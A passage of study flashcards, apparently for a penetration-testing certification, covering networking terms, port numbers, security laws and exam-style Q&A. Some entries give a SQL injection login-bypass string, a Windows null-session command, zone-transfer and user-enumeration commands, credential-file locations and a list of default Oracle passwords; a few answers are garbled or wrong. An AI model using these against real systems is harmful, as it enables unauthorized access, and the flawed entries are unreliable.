another<\/p>\n\n\n\n<p>Ethernet<br>a system for connecting a number of computer systems to form a local area network, with protocols to control the passing of information and to avoid simultaneous transmission by two or more systems.<\/p>\n\n\n\n<p>Token Ring<br>A networking technology developed by IBM in the 1980s. It relies upon direct links between nodes and a ring topology, using tokens to allow nodes to transmit data.<\/p>\n\n\n\n<p>APIPA<br>Automatic Private Internet Protocol Addressing<\/p>\n\n\n\n<p>MTU<br>maximum transmission unit &#8211; The largest data unit a network (for example, Ethernet or token ring) will accept for transmission.<\/p>\n\n\n\n<p>Unicast<br>a message that is sent from a single sender to a single recipient<\/p>\n\n\n\n<p>Multicast<br>a form of transmission in which a message is delivered to a group of hosts<\/p>\n\n\n\n<p>Router Protocol<br>a protocol used between routers so that they can learn routes to add to their routing tables.<\/p>\n\n\n\n<p>Link State Routing<br>A routing method that floods routing<br>information to all routers within a network to build and maintain a more complex network route database.<\/p>\n\n\n\n<p>Distance Vector Routing<br>Each router passes a copy of its routing table to its adjacent neighbors. The neighbor adds the route to its own table, incrementing the metric to reflect the extra distance to the end network. The distance is given as a hop count; the vector component specifies the address of<br>the next hop.<\/p>\n\n\n\n<p>Hybrid Routing<br>Routing protocol that uses the attributes of both distance vector and link state<\/p>\n\n\n\n<p>IGP<br>Interior Gateway Protocol<\/p>\n\n\n\n<p>Interior Gateway Protocol (IGP)<br>A routing protocol that operates within an autonomous system, which is a network under a single administrative control. Includes IGRP, EGRP, RIP, OSPF, and EIGRP<\/p>\n\n\n\n<p>EGP<br>Exterior Gateway Protocol<\/p>\n\n\n\n<p>Exterior Gateway Protocol (EGP)<br>A routing protocol that operates between autonomous systems, which are networks under different administrative control. Border Gateway Protocol (BGP) is the only one in widespread use today.<\/p>\n\n\n\n<p>IPv6<br>A new protocol developed to replace IPv4, addressing the issue of IP address exhaustion.<\/p>\n\n\n\n<p>No broadcast, has Anycast instead.<br>128-bit in Hexidecimal<\/p>\n\n\n\n<p>MAC Address<br>A Media Access Control address is a hardware address that uniquely identifies each node on a network.<\/p>\n\n\n\n<p>Traditional MAC addresses are 12-digit (6 bytes, or 48 bits) hexadecimal numbers.<\/p>\n\n\n\n<p>Network Architectures<br>The design of a computer network; includes both physical and logical design.<\/p>\n\n\n\n<p>10BaseT<br>LAN (Ethernet)<br>10 Mbps<\/p>\n\n\n\n<p>100BaseT<br>&#8220;Fast Ethernet&#8221;<br>100 Mbps<\/p>\n\n\n\n<p>1000BaseT<br>Gigabit Ethernet<br>1 GB<\/p>\n\n\n\n<p>Wireless Network<br>Any type of computer network that is not connected by cables of any kind.<\/p>\n\n\n\n<p>802.11<\/p>\n\n\n\n<p>Shared Media LAN<br>LAN that shares total bandwidth with all stations (ex. Token Ring)<\/p>\n\n\n\n<p>Switched Media LAN<br>LAN with bandwidth shared between sender and receiver (Predicated Paths)<\/p>\n\n\n\n<p>*Hubs are similar, but with NODES<\/p>\n\n\n\n<p>Netcraft<br>Company that tracks web statistics, used to fingerprint web servers<\/p>\n\n\n\n<p>WHOIS<br>a public Internet database that contains information about Internet domain names and the people or organizations that registered the domains. It is a source of information that can be used to exploit system vulnerabilities.<\/p>\n\n\n\n<p>Egress filtering<br>Filtering outbound traffic<\/p>\n\n\n\n<p>Ingress Filtering<br>Filtering inbound traffic<\/p>\n\n\n\n<p>DNS Record Types<br>SOA- Start of Auth Record<br>MX- Mail Exchange<br>TXT- Text Record<br>A- Address (IPv4)<br>AAAA- Address (IPv6)<br>NS &#8211; Name Server<br>PTR &#8211; Pointer Record<br>HINFO &#8211; Description of computer \/ OS<br>CNAME &#8211; Canonical Name<\/p>\n\n\n\n<p>Start of Authority (SOA) Record<br>Every zone file must include a <em>_<\/em> record to identify the name server that&#8217;s primarily responsible for the database segments it manages.<\/p>\n\n\n\n<p>Mail Exchanger (MX) Record<br>A record used by e-mail servers for determining the host names of servers responsible for handling a domain&#8217;s incoming e-mail.<\/p>\n\n\n\n<p>A \/ AAAA Record<br>IP Address<\/p>\n\n\n\n<p>Name Server (NS) Record<br>announces the authoritative name servers for a particular zone who will answer queries for their supported zone<\/p>\n\n\n\n<p>Pointer Record (PTR)<br>A record that points IP addresses\/Canonical to host names. See also Reverse Lookup Zone.<\/p>\n\n\n\n<p>CNAME (Canonical name record)<br>A type of DNS data record that holds alternative names for a host.<\/p>\n\n\n\n<p>Network Protocols<br>ARP<br>DHCP<br>CDP<br>HSRP<br>VRRP<br>VTP<br>STP<br>TACACS<\/p>\n\n\n\n<p>Cisco Discovery Protocol (CDP)<br>a Cisco proprietary Layer 2 protocol to gather information about neighboring Cisco devices<\/p>\n\n\n\n<p>HSRP (Hot Standby Router Protocol)<br>This is exclusive to Cisco and allows a default router address to be configured to be used in the event that the primary router fails.<\/p>\n\n\n\n<p>VRRP (Virtual Router Redundancy Protocol)<br>A standard that assigns a virtual IP address to a group of routers. At first, messages routed to the virtual IP address are handled by the master router. If the master router fails, backup routers stand in line to take over responsibility for the virtual IP address.<\/p>\n\n\n\n<p>VTP (VLAN Trunking Protocol)<br>Cisco&#8217;s protocol for exchanging VLAN information over trunks. Allows one switch on a network to centrally manage all VLANs.<\/p>\n\n\n\n<p>STP (Spanning Tree Protocol)<br>A Layer 2 protocol that is used for routing and prevents network loops by adopting a dynamic routing method.<\/p>\n\n\n\n<p>WEP<br>Wired Equivalent Privacy<\/p>\n\n\n\n<p>Wired Equivalent Privacy (WEP)<br>An IEEE 802.11 security protocol designed to ensure that only authorized parties can view transmitted wireless information. Has significant vulnerabilities and is not considered secure.<\/p>\n\n\n\n<p>WPA<br>Wireless Protected Access<\/p>\n\n\n\n<p>Wireless Protected Access (WPA)<br>The 802.11 security method created as a stopgap between WEP and 802.11i.<\/p>\n\n\n\n<p>WPA2 uses AES Encryption<\/p>\n\n\n\n<p>EAP (Extensible Authentication Protocol)<br>A protocol that enables systems to use hardware-based identifiers, such as fingerprint scanners or smart card readers, for authentication.<\/p>\n\n\n\n<p>EAP<br>Extensible Authentication Protocol<\/p>\n\n\n\n<p>LEAP<br>Lightweight Extensible Authentication Protocol<\/p>\n\n\n\n<p>PEAP<br>Protected Extensible Authentication Protocol<\/p>\n\n\n\n<p>nbtstat<br>A Windows utility that is used to view and<br>manage NetBIOS name cache information.<\/p>\n\n\n\n<p>Global Catalog Server<br>A domain controller that holds a subset of the information in all domain partitions for the entire Active Directory forest.<\/p>\n\n\n\n<p>Master Browser<br>Present on every subnet. Needed for a routed TCP\/IP network<\/p>\n\n\n\n<p>FSMO<br>Flexible Single Master Operations<\/p>\n\n\n\n<p>Flexible Single Master Operations (FSMO) Roles<br>Also known as operations master roles, these are servers that provide certain functions that can only be handled by one domain controller at a time.<\/p>\n\n\n\n<p>LANMAN hash<br>The original hash used to store Windows passwords, known as LM hash, based off the DES algorithm. (Legacy)<\/p>\n\n\n\n<p>NTLM<br>New Technology LAN Manager<\/p>\n\n\n\n<p>NTLM Hash<br>Successor to the LM hash. A more advanced hash used to store Windows passwords, based off the RC4 algorithm.<\/p>\n\n\n\n<p>NTLMv2<br>NTLMv2 was developed in response to attacks against the LM authentication protocol. The LM protocol, as the name implies, was originally used in the old LAN Manager Network operating system in the mid-1980s. It uses the MD5 password hash algorithm.<\/p>\n\n\n\n<p>OSPF (Open Shortest Path First)<br>A link-state routing protocol used on IP networks.<\/p>\n\n\n\n<p>Static Routing<br>An type of routing used by a network<br>administrator to manually specify the mappings in the routing table.<\/p>\n\n\n\n<p>Dynamic Routing<br>Allows a router to determine the best route between two nodes automatically and then store this information in a routing table.<\/p>\n\n\n\n<p>Port 1<br>TCP Port Service Multiplexer (TCPMUX)<\/p>\n\n\n\n<p>Port 5<br>Remote Job Entry (RJE)<\/p>\n\n\n\n<p>Port 7<br>ECHO or ICMP<\/p>\n\n\n\n<p>Port 18<br>Message Send Protocol (MSP)<\/p>\n\n\n\n<p>Port 29<br>MSG ICP<\/p>\n\n\n\n<p>Port 37<br>time<\/p>\n\n\n\n<p>Port 42<br>Host Name Server (Nameserv)<\/p>\n\n\n\n<p>Port 43<br>WHOIS<\/p>\n\n\n\n<p>Port 70<br>Gopher Services<\/p>\n\n\n\n<p>Port 79<br>finger<\/p>\n\n\n\n<p>Port 103<br>X.400 Standard<\/p>\n\n\n\n<p>Port 118<br>SQL Services<\/p>\n\n\n\n<p>Port 119<br>NNTP (Network News Transfer Protocol)<\/p>\n\n\n\n<p>Newsgroup<\/p>\n\n\n\n<p>Port 159<br>SQL Server<\/p>\n\n\n\n<p>Port 190<br>Gateway Access Control Protocol (GACP)<\/p>\n\n\n\n<p>Port 197<br>Directory Location Service (DLS)<\/p>\n\n\n\n<p>Port 396<br>Novell Netware over IP<\/p>\n\n\n\n<p>Port 444<br>Simple Network Paging Protocol (SNPP)<\/p>\n\n\n\n<p>Port 458<br>Apple QuickTime<\/p>\n\n\n\n<p>Port 500<br>IKE Internet Key exchange (TCP\/UDP)<\/p>\n\n\n\n<p>Computer Misuse Act 1990<br>An Act which makes illegal a number of activities such as deliberately planting viruses, hacking, using ICT equipment for fraud.<\/p>\n\n\n\n<p>Human Rights Act 1998<br>Act of Parliament that incorporated the European Convention on Human Rights into UK law, making it enforceable in UK courts<\/p>\n\n\n\n<p>Data Protection Act 1998<br>The UK law that tells organisations how they must protect the personal data of real people. (NOW GDPR)<\/p>\n\n\n\n<p>GDPR (General Data Protection Regulation)<br>New European Union law on data protection and privacy for individuals.<\/p>\n\n\n\n<p>DoS<br>Denial of Service<\/p>\n\n\n\n<p>DDoS (Distributed Denial of Service)<br>An attack on a computer or network device in which multiple computers send data and requests to the device in an attempt to overwhelm it so that it cannot perform normal operations.<\/p>\n\n\n\n<p>XSS (Cross Site Scripting)<br>A type of application attack where the attacker takes advantage of scripting and input validation vulnerabilities in an interactive website to attack legitimate users.<\/p>\n\n\n\n<p>MySQL &lt; 5.1 Authentication Bypass<br>Bug that allows authentication even when password provided is incorrect.<\/p>\n\n\n\n<p>1\/256 chance of being triggered, so one can just keep sending login attempts over and over to access.<\/p>\n\n\n\n<p>*Can only be exploited if built on a system where the memcmp() function can return values outside the -128 to 127 range<\/p>\n\n\n\n<p>Passive OS fingerprinting<br>Observing host behavior and packets (DHCP, TCP, etc) to determine OS<\/p>\n\n\n\n<p>Common Tools: Network Miner, p0f, Satori, Wireshark<\/p>\n\n\n\n<p>Active OS Fingerprinting<br>Sends specially crafted packets to the remote OS and analyzes the received response.<\/p>\n\n\n\n<p>NMap is awesome at this<\/p>\n\n\n\n<p>AES (Advanced Encryption Standard)<br>A block cypher created in the late 1990s that uses a 128-bit block size and a 128-, 129-, or 256-bit key size.<\/p>\n\n\n\n<p>TKIP (Temporal Key Integrity Protocol)<br>A security protocol created by the IEEE 802.11i task group to replace WEP.<\/p>\n\n\n\n<p>SMTP User Enumeration<br>EXPN<br>VRFY<\/p>\n\n\n\n<p>Sendmail &lt; 8.12.9 Buffer Overflow<br>The prescan function in Sendmail 8.12.9 allows remote attackers to execute arbitrary code via buffer overflow attacks, as demonstrated using the parseaddr function in parseaddr.c.<\/p>\n\n\n\n<p>X11<br>Runs on TCP Port 6000<br>(can range between 6000-6063)<\/p>\n\n\n\n<p>Can be intercepted if not tunneled through SSH<\/p>\n\n\n\n<p>RPC (Remote Procedure Call) Enumeration<br>Can be assessed using portmapper requests<\/p>\n\n\n\n<p>Query RPC portmapper using rpcinfo: rpcinfo p<\/p>\n\n\n\n<p>Non-Persistent XSS<br>XSS that occurs when the attacker&#8217;s script that is injected is not stored in the backend, and the Web-browser client simply echoes back the results of the script execution. It can be over GET (QueryString) or POST (Forms) methods.<\/p>\n\n\n\n<p>Can be used to steal cookies, redirect to phishing sites, and force actions if targets click on crafted links<\/p>\n\n\n\n<p>Persistent XSS<br>malicious code that remains on a website (for ex) until it is removed<\/p>\n\n\n\n<p>Good for getting ahold of forms, tickets, submissions, etc<\/p>\n\n\n\n<p>SOAP<br>Simple Object Access Protocol<\/p>\n\n\n\n<p>Simple Object Access Protocol (SOAP)<br>An XML-based communication protocol used for sending messages between applications via the Internet.<\/p>\n\n\n\n<p>XML injection<br>An attack that injects XML tags and data into a database. Can change data, effect how data is processed, etc.<\/p>\n\n\n\n<p>XXE (XML External Entity) Attack<br>This attack occurs when XML input containing a reference to an external entity is processed by a weakly configured XML parser. This attack may lead to the disclosure of confidential data, denial of service, server side request forgery, port scanning from the perspective of the machine where the parser is located, and other system impacts<\/p>\n\n\n\n<p>Web Server Common Flaws<br>Denial of Service (DoS)<br>Buffer overflow attacks<br>Attacks on vulnerable scripts<br>URL manipulation<\/p>\n\n\n\n<p>HTTP Web Methods<br>*Risky Methods are marked with a star<\/p>\n\n\n\n<p>GET<br>HEAD (similar to GET)<br>POST<br>PUT*<br>DELETE*<br>CONNECT*<br>OPTIONS<br>TRACE*<br>PATCH<\/p>\n\n\n\n<p>LDAP Injection<br>An attack that allows for the construction of LDAP statements based on user input statements, which can then be used to access the LDAP database or modify the database&#8217;s information<\/p>\n\n\n\n<p>Base64 Encoding<br>An encoding scheme which represents any binary data using only printable ASCII characters. Usually used for encoding email attachments over SMTP<\/p>\n\n\n\n<p>OSSTMM<br>Open Source Security Testing Methodology Manual<\/p>\n\n\n\n<p>ISECOM<br>Institute for Security and Open Methodologies<\/p>\n\n\n\n<p>OWASP<br>Open Web Application Security Project<\/p>\n\n\n\n<p>PTES<br>Pen Testing Execution Standard<\/p>\n\n\n\n<p>CPNI<br>Centre for the Protection of National Infrastructure (UK best practices)<\/p>\n\n\n\n<p>Police and Justice Act 2006<br>Defines police limitations of searching tech<\/p>\n\n\n\n<p>Computer Fraud and Abuse Act of 1986<br>This act defines cybercrime as any illegal act for which knowledge of computer technology is essential for its perpetration, investigation, or prosecution; currently being evaluated for revision because much of its language was developed before the Internet boom<\/p>\n\n\n\n<p>HIPAA<br>Health Insurance Portability and Accountability Act<\/p>\n\n\n\n<p>FISMA<br>Federal Information Security Management Act<\/p>\n\n\n\n<p>GLBA<br>Gramm-Leach-Bliley Act<\/p>\n\n\n\n<p>Gramm-Leach-Bliley Act of 1999<br>requires financial institutions to ensure the security and confidentiality of customer data<\/p>\n\n\n\n<p>GDPR<br>General Data Protection Regulation<\/p>\n\n\n\n<p>FERPA<br>Family Educational Rights and Privacy Act<\/p>\n\n\n\n<p>PCI DSS<br>Payment Card Industry Data Security Standard<\/p>\n\n\n\n<p>Basel Accord<br>an agreement that required that banks hold as capital at least 8% of their risk-weighted assets<\/p>\n\n\n\n<p>ISO 27000 Series<br>this series contains a range of individual standards and documents specifically reserved by ISO for information security<\/p>\n\n\n\n<p>COBIT<br>Control Objectives for Information and Related Technology<\/p>\n\n\n\n<p>IPv4<br>The Internet Protocol version 4 is the dominant protocol for routing traffic on the Internet, specifying &#8220;to&#8221; and &#8220;from&#8221; addresses using a dotted decimal such as &#8220;122.45.255.0&#8221;.<\/p>\n\n\n\n<p>Cat 5<br>Category 5 wire, a TIA\/EIA standard for UTP wiring that can operate at up to 100 Mbps.<\/p>\n\n\n\n<p>TTL<br>Time to Live<\/p>\n\n\n\n<p>CSMA\/CA<br>Carrier Sense Multiple Access with Collision Avoidance<\/p>\n\n\n\n<p>CDMA<br>Code Division Multiple Access (GSM competitor)<\/p>\n\n\n\n<p>The ATM PDU is the cell<br>OSI physical layer PDU is the bit<br>OSI data link layer PDU is the frame<br>OSI network layer PDU is the packet<br>OSI transport layer PDU is the segment<br>PDUs between OSI session and application layers are referred to simply as the data<br>OSI Model PDU<\/p>\n\n\n\n<p>1.3.6.1.2.1.25.1.6.0<br>System Processes<br>1.3.6.1.2.1.25.4.2.1.2<br>Running Programs<br>1.3.6.1.2.1.25.4.2.1.4<br>Processes Path<br>1.3.6.1.2.1.25.2.3.1.4<br>Storage Units<br>1.3.6.1.2.1.25.6.3.1.2<br>Software Name<br>1.3.6.1.2.1.77.1.2.25<br>User Accounts<br>1.3.6.1.2.1.6.13.1.3<br>TCP Local Ports<br>Microsoft SNMP<\/p>\n\n\n\n<p>TCP Port 1<br>Multiplexer tcpmux<\/p>\n\n\n\n<p>TCP Port 7<br>Echo<\/p>\n\n\n\n<p>TCP Port 11<br>System status. syst at<\/p>\n\n\n\n<p>TCP 13<br>Date and time.<\/p>\n\n\n\n<p>TCP 15<br>netstat<\/p>\n\n\n\n<p>TCP 19<br>chargen<\/p>\n\n\n\n<p>TCP 21<br>ftp<\/p>\n\n\n\n<p>TCP 22<br>ssh<\/p>\n\n\n\n<p>TCP 23<br>Telnet<\/p>\n\n\n\n<p>TCP 25<br>smtp<\/p>\n\n\n\n<p>TCP 37<br>Time<\/p>\n\n\n\n<p>TCP 42<br>wins<\/p>\n\n\n\n<p>TCP 43<br>whois<\/p>\n\n\n\n<p>TCP 49<br>tacacs<\/p>\n\n\n\n<p>TCP 53<br>DNS<\/p>\n\n\n\n<p>TCP 70<br>gopher<\/p>\n\n\n\n<p>TCP 79<br>finger<\/p>\n\n\n\n<p>TCP 80<br>http<\/p>\n\n\n\n<p>TCP 88<br>Kerberos<\/p>\n\n\n\n<p>TCP 110<br>pop3<\/p>\n\n\n\n<p>TCP 113<br>auth<\/p>\n\n\n\n<p>TCP 119<br>nntp<\/p>\n\n\n\n<p>TCP 139<br>Netbios<\/p>\n\n\n\n<p>TCP 143<br>imap<\/p>\n\n\n\n<p>TCP 179<br>bgp<\/p>\n\n\n\n<p>TCP 389<br>LDAP<\/p>\n\n\n\n<p>TCP 443<br>https<\/p>\n\n\n\n<p>TCP 445<br>SMB (cifs)<\/p>\n\n\n\n<p>TCP 512<br>exec (remote)<\/p>\n\n\n\n<p>TCP 513<br>login (remote )<\/p>\n\n\n\n<p>TCP 514<br>shell (remote)<\/p>\n\n\n\n<p>TCP 1080<br>socks proxy<\/p>\n\n\n\n<p>TCP 1433<br>ms-sql<\/p>\n\n\n\n<p>TCP 1521<br>TNS Oracle<\/p>\n\n\n\n<p>TCP 1723<br>pptp<\/p>\n\n\n\n<p>TCP 2433<br>ms-sql (hidden)<\/p>\n\n\n\n<p>TCP 3128<br>squid proxy<\/p>\n\n\n\n<p>TCP 3268<br>Globalcat<\/p>\n\n\n\n<p>TCP 3306<br>mysql<\/p>\n\n\n\n<p>TCP 3389<br>RDP<\/p>\n\n\n\n<p>TCP 5432<br>postgres<\/p>\n\n\n\n<p>TCP 5900<br>vnc<\/p>\n\n\n\n<p>TCP 6000<br>X11<\/p>\n\n\n\n<p>TCP 9100<br>Jetdirect<\/p>\n\n\n\n<p>UDP 53<br>DNS<\/p>\n\n\n\n<p>UDP 67 and 68<br>DHCP<\/p>\n\n\n\n<p>UDP 69<br>ttfp<\/p>\n\n\n\n<p>UDP 123<br>ntp<\/p>\n\n\n\n<p>UDP 135<br>RPC<\/p>\n\n\n\n<p>UDP 137 and 138<br>Netbios<\/p>\n\n\n\n<p>UDP 161<br>snmp<\/p>\n\n\n\n<p>UDP 445<br>SMB<\/p>\n\n\n\n<p>UDP 500<br>IKE<\/p>\n\n\n\n<p>UDP 513<br>rwho<\/p>\n\n\n\n<p>UDP 520<br>RIP<\/p>\n\n\n\n<p>UDP 1434<br>ms-sql \/ ssrs<\/p>\n\n\n\n<p>UDP 2049<br>nfs<\/p>\n\n\n\n<p>TKIP<br>Temporal Key Integrity Protocol<\/p>\n\n\n\n<p>XML<br>Extensible Markup Language<\/p>\n\n\n\n<p>LSASS<br>Local Security Authority Subsystem Service<\/p>\n\n\n\n<p>LSA<br>Local Security Authority<\/p>\n\n\n\n<p>RSA<br>Rivest, Shamir, &amp; Adleman<\/p>\n\n\n\n<p>CRLF<br>carriage-return\/line-feed<\/p>\n\n\n\n<p>OSPF<br>Open Shortest Path First<\/p>\n\n\n\n<p>NFS<br>Network File System<\/p>\n\n\n\n<p>RIP<br>Routing Information Protocol<\/p>\n\n\n\n<p>IKE<br>Internet Key Exchange<\/p>\n\n\n\n<p>AES<br>Advanced Encryption Standard<\/p>\n\n\n\n<p>SQL<br>Structured Query Language<\/p>\n\n\n\n<p>ISAPI<br>Internet Server Application Programming Interface<\/p>\n\n\n\n<p>ASP<br>Active Server Pages<\/p>\n\n\n\n<p>NTP<br>Network Time Protocol<\/p>\n\n\n\n<p>WSUS<br>Windows Server Update Services<\/p>\n\n\n\n<p>SSH<br>Secure Shell<\/p>\n\n\n\n<p>WSDL<br>Web Services Description Language<\/p>\n\n\n\n<p>CNAME<br>Canonical Name<\/p>\n\n\n\n<p>TTL<br>Time to Live<\/p>\n\n\n\n<p>CGI<br>Common Gateway Interface<\/p>\n\n\n\n<p>STP<br>Spanning Tree Protocol<\/p>\n\n\n\n<p>In a DNS zone transfer, what is a requested?<br>Requests all data on a domain.<\/p>\n\n\n\n<p>Telnet remote machine returns :<\/p>\n\n\n\n<p>User Access Verification<br>Password.<\/p>\n\n\n\n<p>Which o\/s?<br>Cisco ios<\/p>\n\n\n\n<p>DES<br>Data Encryption Standard<\/p>\n\n\n\n<p>DES. Key size?<br>56 bits<\/p>\n\n\n\n<p>HTTP OSI Model layer?<br>Layer 7: Application<\/p>\n\n\n\n<p>HTTP Code. Temporarily moved?<br>302<\/p>\n\n\n\n<p>SQL server resolution service introduced?<br>SQL server 2000<\/p>\n\n\n\n<p>SQL server stored procedures.<br>xp_cmdshell<\/p>\n\n\n\n<p>ICMP type 8 response to host without firewall<br>Echo<\/p>\n\n\n\n<p>SYS user password (oracle)<br>CHANGE_ON_INSTALL<\/p>\n\n\n\n<p>how can HTTP Trace method used against web server?<br>user cookie and session information compromised<\/p>\n\n\n\n<p>Java technique that minimises threat from applets<br>Sandbox<\/p>\n\n\n\n<p>enumerate users with empty GECOS field.<br>finger 0@<\/p>\n\n\n\n<p>LANMAN and NTLM.<br>Don&#8217;t use a salt.<\/p>\n\n\n\n<p>Stored procedure xp_cmdshell can?<br>Execute any DOS commands.<\/p>\n\n\n\n<p>Unmap unused ISAPI filters to\u2026?<br>\u2026..reduce attack surface against IIS<\/p>\n\n\n\n<p>Which SQL string can be used in username to bypass an authentication mechanism.<br>&#8216; or 1=1 &#8211; &#8211;<\/p>\n\n\n\n<p>Different Web site host names have same IP. How does web server differentiate?<br>Inspecting host field in client request.<\/p>\n\n\n\n<p>HTTP Method for enumerating HTTP methods.<br>OPTIONS<\/p>\n\n\n\n<p>EXPN command protocol?<br>SMTP<\/p>\n\n\n\n<p>DNS Zone transfer command.<br>dig @relay.example.org example.org axfr<\/p>\n\n\n\n<p>SMTP commands to enumerate users on a default Sendmail server.<br>VRFY EXPN RCPT TO<\/p>\n\n\n\n<p>CVE-2003-0780 MySQL version has post authentication privilege escalation issue.<br>MySQL 4.0.15<\/p>\n\n\n\n<p>DES Data block size<br>64 bits<\/p>\n\n\n\n<p>RC4 Key size<br>128<\/p>\n\n\n\n<p>Symmetric encryption algorithm.<br>AES<\/p>\n\n\n\n<p>Salted md5?<br>Salted md5?<\/p>\n\n\n\n<p>Trusted hosts and usernames for unix r-services<br>\/etc\/hosts.equiv<\/p>\n\n\n\n<p>Cookie attribute for must stored on disk<br>Expires<\/p>\n\n\n\n<p>Null session to windows.<br>net use \\host\\ipc$&#8221;&#8221; \/u:&#8221;&#8221;<\/p>\n\n\n\n<p>Reason for written permission for pen test.<br>Misuse of computer act.<\/p>\n\n\n\n<p>CVE-2002-0906 buffer overflow, sendmail version.<br>8.12.4<\/p>\n\n\n\n<p>Which ruser command lists active user details.<br>rusers -l<\/p>\n\n\n\n<p>Password hashes stored on linux<br>\/etc\/shadow<\/p>\n\n\n\n<p>HTTP Methods<br>Options, delete,put,trace,<\/p>\n\n\n\n<p>SAM file location<br>%systemroot%\\system32\\config\\SAM<\/p>\n\n\n\n<p>IIS 5.0. Which o\/s?<br>Windows 2000<\/p>\n\n\n\n<p>IPv6 bits?<br>128<\/p>\n\n\n\n<p>How are cookies presented back to the server?<br>Cookie HTTP header.<\/p>\n\n\n\n<p>SOAP<br>Simple Object Access Protocol<\/p>\n\n\n\n<p>HTTP method for soap api data transfer?<br>POST<\/p>\n\n\n\n<p>Windows permissions<\/p>\n\n\n\n<p>Windows tracert packets?<br>ICMP<\/p>\n\n\n\n<p>Which command enumerates exchange server connected by Telnet.<br>EHLO<\/p>\n\n\n\n<p>SSH version susceptible to man in the middle attacks.<br>Version 1<\/p>\n\n\n\n<p>TTL = 128. Which o\/s?<br>Windows<\/p>\n\n\n\n<p>Public Key Encryption<br>RSA<\/p>\n\n\n\n<p>ICMP destination host unreachable (number?)<br>3<\/p>\n\n\n\n<p>Windows command to list all patches<br>wmic qfe<\/p>\n\n\n\n<p>TNS listener default config.<br>Before Oracle 10g it could be remotely managed.<\/p>\n\n\n\n<p>LDAP command injection characters.<br>()&amp;*|<\/p>\n\n\n\n<p>RSA<br>Rivest, Shamir, &amp; Adleman<\/p>\n\n\n\n<p>Self signed SSL. Certificate vulnerability<br>Spoof certificate and execute man in the middle attack<\/p>\n\n\n\n<p>Cookie can be accessed by client side scripts. Which cookie attribute?<br>httponly<\/p>\n\n\n\n<p>CVE-2001-0414 NTP remote exploit version?<br>4.0.99k<\/p>\n\n\n\n<p>AD database filename<br>NTDS.DIT<\/p>\n\n\n\n<p>IPv4 bits?<br>32 bits<\/p>\n\n\n\n<p>Prevent user enumeration through null sessions. Which registry?<br>Restrict Anonymous.<\/p>\n\n\n\n<p>IKE Main mode more secure than aggressive. Because?<br>identity protection.<\/p>\n\n\n\n<p>DNS Zone Reverse look up record. For ip 192.168.1.10<br>10.1.168.192. In-addr.arpa. IN PTR alpha.example.com<\/p>\n\n\n\n<p>BIND version information. Command?<br>dig @beta.example.com version.bind chaos txt<\/p>\n\n\n\n<p>xhost &#8211;<br>Host based authentication disabled.<\/p>\n\n\n\n<p>NOT a SIP method.<br>Quit.<\/p>\n\n\n\n<p>FTP command to initiate data transfer<br>PORT<\/p>\n\n\n\n<p>MAC address size.<br>48 Bits<\/p>\n\n\n\n<p>802.3<br>Ethernet<\/p>\n\n\n\n<p>DBSNMP default password?<br>DBSNMP<\/p>\n\n\n\n<p>CVE 2012-5615 MySQL 5.6.0 vulnerability.?<br>Username enumeration.<\/p>\n\n\n\n<p>NOT an ICMP message<br>Bad Length<\/p>\n\n\n\n<p>PHP version chunk_split()function overflow<\/p>\n\n\n\n<p>HTTP status code bad request?<br>400<\/p>\n\n\n\n<p>TFTP command to list directory.<br>You cannot list directory.<\/p>\n\n\n\n<p>ARP<br>Address Resolution Protocol<\/p>\n\n\n\n<p>VTP<br>VLAN Trunking Protocol<\/p>\n\n\n\n<p>CDP<br>Cisco Discovery Protocol<\/p>\n\n\n\n<p>TACACS<br>Terminal Access Controller Access Control System<\/p>\n\n\n\n<p>100<br>Continue<\/p>\n\n\n\n<p>101<br>Switching Protocols<\/p>\n\n\n\n<p>102<br>Processing<\/p>\n\n\n\n<p>Internet Protocol Security (IPsec)<br>a secure network protocol suite that authenticates and encrypts the packets of data sent over an Internet Protocol network<\/p>\n\n\n\n<p>Internet Protocol Security (IPsec)<br>used in virtual private networks (VPNs)<\/p>\n\n\n\n<p>number of possible TCP ports<br>65535<\/p>\n\n\n\n<p>number of possible UDP ports<br>65535<\/p>\n\n\n\n<p>RFC1918 24-bit block<br>10.0.0.0\/8<\/p>\n\n\n\n<p>RFC1918 20-bit block<br>172.16.0.0\/12<\/p>\n\n\n\n<p>RFC1918 16-bit block<br>192.168.0.0\/16<\/p>\n\n\n\n<p>Common Vulnerabilities and Exposures (CVE)<br>provides a reference-method for publicly known information-security vulnerabilities and exposures<\/p>\n\n\n\n<p>Common Vulnerability Scoring System (CVSS)<br>an open industry standard for assessing the severity of computer system security vulnerabilities<\/p>\n\n\n\n<p>DREAD<br>part of a system for risk-assessing computer security threats<\/p>\n\n\n\n<p>Common Weakness Enumeration (CWE)<br>a category system for software weaknesses and vulnerabilities<\/p>\n\n\n\n<p>National Vulnerability Database (NVD)<br>the U.S. government repository of standards-based vulnerability management data represented using the Security Content Automation Protocol (SCAP)<\/p>\n\n\n\n<p>500<br>Internal Server Error<\/p>\n\n\n\n<p>501<br>Not Implemented<\/p>\n\n\n\n<p>502<br>Bad Gateway<\/p>\n\n\n\n<p>503<br>Service Unavailable<\/p>\n\n\n\n<p>504<br>Gateway Timeout<\/p>\n\n\n\n<p>505<br>HTTP Version Not Supported<\/p>\n\n\n\n<p>511<br>Network Authentication Required<\/p>\n\n\n\n<p>CHANGE_ON_INSTALL<br>SYS<\/p>\n\n\n\n<p>MANAGER<br>SYSTEM<\/p>\n\n\n\n<p>TIGER<br>SCOTT<\/p>\n\n\n\n<p>WOOD<br>ADAMS<\/p>\n\n\n\n<p>STEEL<br>JONES<\/p>\n\n\n\n<p>CLOTH<br>CLARK<\/p>\n\n\n\n<p>PAPER<br>BLAKE<\/p>\n\n\n\n<p>TRACE<br>TRACESVR<\/p>\n\n\n\n<p>MANAGER<br>OLAPSYS<\/p>\n\n\n\n<p>CHANGE_ON_INSTALL<br>XDB<\/p>\n\n\n\n<p>400<br>Bad Request<\/p>\n\n\n\n<p>401<br>Unauthorized<\/p>\n\n\n\n<p>402<br>Payment Required<\/p>\n\n\n\n<p>403<br>Forbidden<\/p>\n\n\n\n<p>404<br>Not Found<\/p>\n\n\n\n<p>405<br>Method Not Allowed<\/p>\n\n\n\n<p>406<br>Not Acceptable<\/p>\n\n\n\n<p>407<br>Proxy Authentication Required<\/p>\n\n\n\n<p>408<br>Request Timeout<\/p>\n\n\n\n<p>409<br>Conflict<\/p>\n\n\n\n<p>410<br>Gone<\/p>\n\n\n\n<p>411<br>Length Required<\/p>\n\n\n\n<p>413<br>Payload Too Large<\/p>\n\n\n\n<p>426<br>Upgrade Required<\/p>\n\n\n\n<p>429<br>Too Many Requests<\/p>\n\n\n\n<p>threat<br>a source of potential disruption, which has the potential to cause a risk<\/p>\n\n\n\n<p>risk<br>the combination 